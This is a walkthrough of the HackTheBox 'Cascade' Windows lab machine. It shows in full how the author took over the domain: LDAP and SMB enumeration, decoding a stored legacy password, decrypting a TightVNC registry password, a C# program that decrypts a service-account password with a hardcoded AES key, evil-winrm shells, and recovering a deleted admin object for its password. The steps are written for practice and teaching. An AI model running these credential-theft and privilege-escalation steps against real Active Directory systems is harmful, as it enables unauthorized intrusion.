HackTheBox - Cascade
Summary
| Cascade | |
|---|---|
| Difficulty: | Medium |
| OS: | Windows |
| Release date: | 28-03-2020 |
| Cascade was a medium Windows machine that involved a lot of SMB and LDAP enumeration. User access was obtained through decryption of a password found in a TightVNC registry file. Privilege escalation and recovering an object from the AD recycle bin granted administrator access. | |
Foothold
An Nmap scan revealed that this was a machine within an Active Directory (AD) environment with “cascade.local” as its domain.
mick@kali:~/Documents/HackTheBox/Cascade$ nmap -sC -sV -Pn -oN nmap_cascade 10.10.10.182
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-03 13:25 CEST
Host is up (0.032s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-04-14T15:56:03
|_ start_date: 2020-04-14T12:07:18
To gather more information about the users on this system I ran ldapsearch. This produced a huge amount of output that I had to sift through. While looking through the output I stumbled upon an interesting property for “Ryan Thompson”.
mick@kali:~/Documents/HackTheBox/Cascade$ ldapsearch -x -H ldap://10.10.10.182 -b "dc=cascade,dc=local" >> ldapsearch_cascade
...
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
...
The last property ‘cascadeLegacyPwd’ had the value “clk0bjVldmE=”. This is Base64 encoded and decodes to ‘rY4n5eva’. The username ‘r.thompson’ in combination with the password ‘rY4n5eva’ granted me access to the machine and allowed me to retrieve a share listing.
mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U r.thompson%rY4n5eva -L \\\\10.10.10.182\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
User access
After enumerating the contents of several shares I stumbled upon several interesting files in the “Data” share.
mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U r.thompson%rY4n5eva \\\\10.10.10.182\\Data
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> cd Temp
smb: \IT\Temp\> ls
. D 0 Tue Jan 28 23:06:59 2020
.. D 0 Tue Jan 28 23:06:59 2020
r.thompson D 0 Tue Jan 28 23:06:53 2020
s.smith D 0 Tue Jan 28 21:00:01 2020
13106687 blocks of size 4096. 7793884 blocks available
smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> ls
. D 0 Tue Jan 28 21:00:01 2020
.. D 0 Tue Jan 28 21:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 20:27:44 2020
13106687 blocks of size 4096. 7793884 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (8.0 KiloBytes/sec) (average 15.9 KiloBytes/sec)
mick@kali:~/Documents/HackTheBox/Cascade$ cat 'VNC Install.reg'
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
...
These appear to be registry keys belonging to TightVNC. After doing some research about registry keys I found out that hex values for registry keys are simply comma-delimited:
“Value B”=hex:<Binary data (as comma-delimited list of hexadecimal values)> - [ https://en.wikipedia.org/wiki/Windows_Registry#.REG_files ]
Removing the comma’s and converting the hex representation to readable text gave me gibberish, which hinted me that the password is encrypted. According to this source, the password is encrypted with DES. It was worth a try since there are already tools available for this. I first stores the hex value in a file called ‘passwd’ and then successfuly decrypted it using using this tool.
mick@kali:~/Documents/HackTheBox/Cascade/vncpwd$ echo 6bcf2a4b6e5aca0f | xxd -r -p >> passwd
mick@kali:~/Documents/HackTheBox/Cascade/vncpwd$ ./vncpwd passwd
Password: sT333ve2
I successfully authenticated as user ’s.smith' since I was able to list the machine’s shares.
mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U s.smith%sT333ve2 -L \\\\10.10.10.182\\
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
An attempt to get a shell as ’s.smith' with evil-winrm was also successful which means I had obtained user access.
mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u s.smith -p sT333ve2
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls
Directory: C:\Users\s.smith\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/25/2020 8:22 AM 32976 mabite.bat
*Evil-WinRM* PS C:\Users\s.smith\Desktop> cat user.txt
94a79f36313198604c70c1c575f008b7
Root access
Root access was not straightforward and required an additional privilege escalation to the user ‘ArkSvc’.
Privilege escalation to ArkSvc
I connected to the ‘Audit$' share as ’s.smith’ and found a database file in the ‘DB’ folder. With that I also downloaded ‘CascAudit.exe’ and ‘CascAudit.dll’ since these could be useful.
mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U s.smith%sT333ve2 \\\\10.10.10.182\\Audit$
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 19:01:26 2020
.. D 0 Wed Jan 29 19:01:26 2020
CascAudit.exe A 13312 Tue Jan 28 22:46:51 2020
CascCrypto.dll A 12288 Wed Jan 29 19:00:20 2020
DB D 0 Tue Jan 28 22:40:59 2020
RunAudit.bat A 45 Wed Jan 29 00:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 07:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 07:38:38 2019
x64 D 0 Sun Jan 26 23:25:27 2020
x86 D 0 Sun Jan 26 23:25:27 2020
smb: \> get CascAudit.exe
smb: \> get CascCrypto.dll
smb: \> cd DB
smb: \DB> get Audit.db
mick@kali:~/Documents/HackTheBox/Cascade/AUDIT_share$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002
To browse through the ‘Audit.db’ file I opened it in SQLite Browser.
The table ‘Ldap’ contained credentials for the user ‘ArkSvc’.
The password is Base64 encoded and decoding it produced gibberish, which (again) hinted me that this password is encrypted. The files ‘CascAudit.exe’ and ‘CascAudit.dll’ could help with decryption though. By decompiling ‘CascAudit.exe’ using ILSpy I found out that this password was encryped with a static key by looking at line 52.
This ‘Crypto’ class is located in ‘CascCrypto.dll’. After decompiling ‘CascCrypto.dll’ as well, I found out all parameters that I needed for decryption.
It was now just a matter of writing a program that decrypted the password, which I did by simply copying the decryption function and filling in the parameters.
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
using System.Threading.Tasks;
namespace CascadeDecryption
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("===================================");
Console.WriteLine("Decrypting password for ArkSvc:");
Console.WriteLine("===================================");
Console.WriteLine("Password: " + DecryptString("BQO5l5Kj9MdErXx6Q6AGOw==", "c4scadek3y654321"));
Console.ReadKey();
}
public static string DecryptString(string EncryptedString, string Key)
{
byte[] array = Convert.FromBase64String(EncryptedString);
Aes aes = Aes.Create();
aes.KeySize = 128;
aes.BlockSize = 128;
aes.IV = Encoding.UTF8.GetBytes("1tdyjCbY1Ix49842");
aes.Mode = CipherMode.CBC;
aes.Key = Encoding.UTF8.GetBytes(Key);
using (MemoryStream stream = new MemoryStream(array))
{
using (CryptoStream cryptoStream = new CryptoStream(stream, aes.CreateDecryptor(), CryptoStreamMode.Read))
{
byte[] array2 = new byte[checked(array.Length - 1 + 1)];
cryptoStream.Read(array2, 0, array2.Length);
return Encoding.UTF8.GetString(array2);
}
}
}
}
}
The output revealed the passsword ‘w3lc0meFr31nd’.
===================================
Decrypting password for ArkSvc:
==================================
Password: w3lc0meFr31nd
With these credentials I managed to set up an evil-winrm shell as ‘ArkSvc’.
mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents>
Privilege escalation to Administrator
Since I didn’t manage to find anything particularly interesting, I decided to go back to enumerate other SMB shares. In particular the “Data” share.
mick@kali:~/Documents/HackTheBox/Cascade$ smbclient -U ArkSvc%w3lc0meFr31nd \\\\10.10.10.182\\Data
smb: \> cd IT
smb: \IT\> cd "Email Archives"
smb: \IT\Email Archives\> ls
. D 0 Tue Jan 28 19:00:30 2020
.. D 0 Tue Jan 28 19:00:30 2020
Meeting_Notes_June_2018.html A 2522 Tue Jan 28 19:00:12 2020
13106687 blocks of size 4096. 7793884 blocks available
smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (18.9 KiloBytes/sec) (average 18.9 KiloBytes/sec)
The content of the file revealed the existence of an account called ‘TempAdmin’.
While looking further through the “Data” share I also discovered an interesting log file.
smb: \> cd IT
smb: \IT\> ls
. D 0 Tue Jan 28 19:04:51 2020
.. D 0 Tue Jan 28 19:04:51 2020
Email Archives D 0 Tue Jan 28 19:00:30 2020
LogonAudit D 0 Tue Jan 28 19:04:40 2020
Logs D 0 Wed Jan 29 01:53:04 2020
Temp D 0 Tue Jan 28 23:06:59 2020
smb: \IT\> cd Logs
smb: \IT\Logs\> ls
. D 0 Wed Jan 29 01:53:04 2020
.. D 0 Wed Jan 29 01:53:04 2020
Ark AD Recycle Bin D 0 Fri Jan 10 17:33:45 2020
DCs D 0 Wed Jan 29 01:56:00 2020
13106687 blocks of size 4096. 7786395 blocks available
smb: \IT\Logs\> cd "Ark AD Recycle bin"
smb: \IT\Logs\Ark AD Recycle bin\> ls
. D 0 Fri Jan 10 17:33:45 2020
.. D 0 Fri Jan 10 17:33:45 2020
ArkAdRecycleBin.log A 1303 Wed Jan 29 02:19:11 2020
13106687 blocks of size 4096. 7786395 blocks available
smb: \IT\Logs\Ark AD Recycle bin\> get ArkAdRecycleBin.log
getting file \IT\Logs\Ark AD Recycle bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (12.6 KiloBytes/sec) (average 12.6 KiloBytes/sec)
The last 6 lines in this log file told me that the user TempAdmin had been moved to the AD recycle bin.
mick@kali:~/Documents/HackTheBox/Cascade/DATA_share$ cat ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0
After doing some research I managed to find this useful source to recover items from the AD recycle bin. To do this I reconnected as ‘ArkSvc’.
mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u ArkSvc -p w3lc0meFr31nd
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
...
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
...
This command unfortunately only told me that this object had indeed been deleted. Adding the -properties * flag did give me all properties of this deleted object.
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -properties *
...
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName : TempAdmin
instanceType : 4
isDeleted : True
LastKnownParent : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 1/27/2020 3:24:34 AM
modifyTimeStamp : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN : TempAdmin
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 132245689883479503
sAMAccountName : TempAdmin
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : [email protected]
uSNChanged : 237705
uSNCreated : 237695
whenChanged : 1/27/2020 3:24:34 AM
whenCreated : 1/27/2020 3:23:08 AM
This property ‘cascadeLegacyPwd’ contained another password that is Base64 encoded. Fortunately this password was not encrypted.
mick@kali:~/Documents/HackTheBox/Cascade/DATA_share$ echo YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles
This password did not work for ‘TempAdmin’. I then remembered that the meeting notes from earlier said “password is the same as the normal admin account password”. Using this password, I successsfully managed to get access as Administrator.
mick@kali:~/Documents/HackTheBox/Cascade$ evil-winrm -i 10.10.10.182 -u Administrator -p baCT3r1aN00dles
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
39e25938654e9a9c5ce9b4a28bcfbcc9